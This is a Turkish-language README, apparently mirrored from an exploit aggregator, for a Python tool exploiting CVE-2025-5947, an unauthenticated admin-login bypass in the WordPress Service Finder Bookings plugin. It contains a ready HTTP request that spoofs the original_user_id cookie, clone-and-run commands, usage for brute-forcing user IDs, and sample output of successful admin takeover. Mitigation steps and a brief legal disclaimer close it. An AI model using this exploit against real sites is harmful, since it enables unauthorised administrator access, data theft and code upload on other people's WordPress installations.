Share
## https://sploitus.com/exploit?id=17D52CC0-4C26-5072-A262-F118CA8283B7
# CVE-2025-5947
CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit
# CVE-2025-5947 Exploit - Service Finder Bookings

![License](https://img.shields.io/badge/license-MIT-blue.svg)
![Python](https://img.shields.io/badge/python-3.6%2B-blue)
![Status](https://img.shields.io/badge/status-Active-brightgreen)
![CVSS](https://img.shields.io/badge/CVSS-9.8%20Critical-red)

> WordPress Service Finder Bookings ≤ 6.0 eklentisinde kimlik doğrulama bypass açığı için exploit aracı

## 📋 İçindekiler

- [Açık Hakkında](#açık-hakkında)
- [Teknik Detaylar](#teknik-detaylar)
- [Kurulum](#kurulum)
- [Kullanım](#kullanım)
- [Örnekler](#örnekler)
- [Sonuçlar](#sonuçlar)
- [Güvenlik](#güvenlik)
- [Kaynaklar](#kaynaklar)

## 🔴 Açık Hakkında

### CVE-2025-5947

**Service Finder Bookings** WordPress eklentisinin 6.0 ve önceki sürümlerinde kritik bir kimlik doğrulama bypass açığı bulunmaktadır.

| Özellik | Değer |
|---------|-------|
| **CVE ID** | CVE-2025-5947 |
| **Eklenti** | Service Finder Bookings (sf-booking) |
| **Etkilenen Versiyon** | ≤ 6.0 |
| **Şiddet** | 🔴 **KRİTİK** |
| **CVSS Skoru** | 9.8 |
| **CWE** | CWE-639 (Authorization Bypass) |
| **EPSS Skoru** | 0.617 (98.357 persentil) |
| **Yayın Tarihi** | 2025 |

### 🎯 Etki

Kimlik doğrulaması olmayan saldırganlar:
- ✅ Herhangi bir kullanıcı olarak giriş yapabilir
- ✅ Admin hesaplarına erişim sağlayabilir
- ✅ Tam sistem kontrolü elde edebilir
- ✅ Veri sızıntısı yapabilir
- ✅ Zararlı kod yükleyebilir

## 🔍 Teknik Detaylar

### Açığın Nedeni

`service_finder_switch_back()` fonksiyonunda **yetersiz cookie doğrulaması** vardır:

```php
// Güvenli olmayan kod
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // Doğrulama yok!
}
```

### Saldırı Vektörü

```http
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1
```

**Saldırı Özellikleri:**
- 🌐 Uzaktan Erişim (AV:N)
- 🔓 Kimlik Doğrulama Yok (PR:N)
- 👤 Kullanıcı Etkileşimi Yok (UI:N)
- 📊 Tam Etki (C:H, I:H, A:H)

## 📦 Kurulum

### Gereksinimler

- Python 3.6+
- requests kütüphanesi

### Adım 1: Repository'yi Klonla

```bash
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947
```

### Adım 2: Bağımlılıkları Yükle

```bash
pip install -r requirements.txt
```

### Adım 3: Çalıştır

```bash
python exploit.py -u http://target.com
```

## 🚀 Kullanım

### Temel Komutlar

```bash
# Yardım göster
python exploit.py -h

# Admin (ID=1) olarak giriş dene
python exploit.py -u http://target.com

# Belirli kullanıcı ID'si ile
python exploit.py -u http://target.com -i 5

# Brute force (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL doğrulaması olmadan
python exploit.py -u http://target.com --no-ssl-verify

# Özel timeout ile
python exploit.py -u http://target.com -t 30
```

### Parametreler

| Parametre | Kısaltma | Açıklama | Varsayılan |
|-----------|----------|---------|-----------|
| `--url` | `-u` | Hedef URL (zorunlu) | - |
| `--user-id` | `-i` | Kullanıcı ID | 1 |
| `--brute-force` | `-b` | Brute force aralığı (1-10) | - |
| `--no-ssl-verify` | - | SSL doğrulamasını devre dışı bırak | False |
| `--timeout` | `-t` | İstek timeout (saniye) | 10 |

## 💡 Örnekler

### Örnek 1: Basit Exploit

```bash
python exploit.py -u http://wordpress.local
```

**Çıktı:**
```
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings eklentisi bulundu

🔍 Kullanıcı ID 1 ile giriş denemesi yapılıyor...
📊 HTTP Status: 302
📋 Response Headers:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ BAŞARILI! Admin olarak giriş yapıldı!
📍 Yönlendirme: http://wordpress.local/wp-admin/
```

### Örnek 2: Brute Force

```bash
python exploit.py -u http://target.com -b 1-20
```

**Çıktı:**
```
🔄 Brute Force Başlıyor (20 kullanıcı)...
✅ Kullanıcı ID 1: BAŞARILI
❌ Kullanıcı ID 2: Başarısız
✅ Kullanıcı ID 3: BAŞARILI
...
✅ Başarılı Kullanıcılar: [1, 3, 5]
```

### Örnek 3: HTTPS ile SSL Doğrulaması Olmadan

```bash
python exploit.py -u https://target.com --no-ssl-verify
```

## 📊 Sonuçlar

Başarılı exploit şu göstergeleri içerir:

✅ HTTP 301 veya 302 yanıt kodu  
✅ `Location` header'ında `/wp-admin/` bulunması  
✅ `Set-Cookie` header'ında `wordpress_logged_in_` bulunması  

## 🛡️ Güvenlik

### ⚠️ Yasal Uyarı

**Bu araç yalnızca:**
- ✅ Yetkili güvenlik testleri için
- ✅ Kendi sistemlerinizde
- ✅ Yazılı izin ile

**Kullanılmalıdır. Yazarı sorumlu değildir.**

### 🔐 Korunma Yolları

1. **Acil Güncelleme**
   ```bash
   # WordPress admin panelinden güncelle
   # veya WP-CLI ile
   wp plugin update sf-booking
   ```

2. **Eklentiyi Devre Dışı Bırak**
   ```bash
   wp plugin deactivate sf-booking
   ```

3. **Eklentiyi Kaldır**
   ```bash
   wp plugin delete sf-booking
   ```

4. **Web Application Firewall (WAF)**
   ```
   Block: /wp-admin/admin-ajax.php?action=service_finder_switch_back
   ```

5. **Güvenlik Kontrolü**
   - Admin hesaplarını kontrol et
   - Erişim loglarını incele
   - Yetkisiz giriş araştır

## 📚 Kaynaklar

- [Patchstack Veritabanı](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability)
- [GitHub Advisory](https://github.com/advisories/GHSA-x2xx-4qhp-2vqx)
- [NVD Detayları](https://nvd.nist.gov/vuln/detail/CVE-2025-5947)
- [Orijinal Exploit](https://github.com/M4rgs/CVE-2025-5947_Exploit)
- [CVSS Calculator](https://www.first.org/cvss/calculator/3.1)

## 🤝 Katkıda Bulunma

Hataları bildirmek veya geliştirmeler önerlemek için:

1. Fork'la
2. Feature branch oluştur (`git checkout -b feature/improvement`)
3. Commit et (`git commit -am 'Add improvement'`)
4. Push et (`git push origin feature/improvement`)
5. Pull Request aç

## 📄 Lisans

MIT License - Detaylar için [LICENSE](LICENSE) dosyasına bakın

## 👤 Yazar

**Security Researcher**
- GitHub: [@yourusername](https://github.com/xxconi)


## 🙏 Teşekkürler

- Patchstack Security Team
- WordPress Security Community
- CVE Coordinators

---



⭐ Faydalı bulduysan, yıldız ver!

[🔝 Başa Dön](#cve-2025-5947-exploit---service-finder-bookings)